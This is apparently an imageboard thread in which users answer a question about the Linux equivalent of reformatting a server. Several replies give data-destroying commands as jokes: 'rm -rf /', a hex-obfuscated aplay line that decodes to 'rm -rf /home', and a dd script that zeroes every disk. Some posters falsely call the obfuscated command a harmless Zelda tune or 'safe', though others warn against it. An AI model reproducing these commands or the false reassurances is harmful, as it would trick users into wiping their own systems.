What is the Linux equivalent?
I have never, ever had to reformat one of our linux servers
>>107156261Plug the install media back in
>>107156261wipe /home
>>107156261
>>107156261sudo rm -rf /
>>107156261aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>107156261We'd go back to our first snapshot.
>>107156261distrohopping
>>107156261hammer to the hard drive and sell the computer without any storage because it's all filled with cheese pizza
>>107156355cool zelda theme, I didn't know you could do that with the terminal
>>107157430>hammerI've been using a power drill but to each their own.I'm also fucking up the traces with a screwdriver just in case.
>>107156355As a reminder, do not run any obfuscated Linux commands you see on 4chan.
>>107157550that one's not obfuscated thougheverit just uses the hexadecimal notation for musical notes
>>107156355rm -rf /home
>>107156355This is one of the safest commands to run anywhere just try it.
>>107157681Meant for >>107157668
>>107157550Ha-ha, he ran it, go back
>>107157888Yeah, in a bash emulator online. You think I'm a fucking retard?
>>107156355Don'tThis deletes /home and will theorically play audio out of the raw data rm will send to stdout
>>107158123OP asked, Anonymous delivered.
>>107157923I don't think it, I know it.
>>107156261rpm-ostree reset and then just delete your /home
>>107156261#!/usr/bin/bashfor DEVICE in $(ls -Ahls /dev | grep -e 'disk' | grep -v -e "[a-z][0-9]" | awk '{print $1}'; mount | awk '{print $1}' | grep -e '/dev/';); do dd if=/dev/zero of=${DEVICE} bs=1M & done && echo -en "\n\nPLEASE WAIT! :^)\n\n";
#!/usr/bin/bashfor DEVICE in $(ls -Ahls /dev | grep -e 'disk' | grep -v -e "[a-z][0-9]" | awk '{print $1}'; mount | awk '{print $1}' | grep -e '/dev/';); do dd if=/dev/zero of=${DEVICE} bs=1M & done && echo -en "\n\nPLEASE WAIT! :^)\n\n";
>>107158415Oh, run it after opening a root console.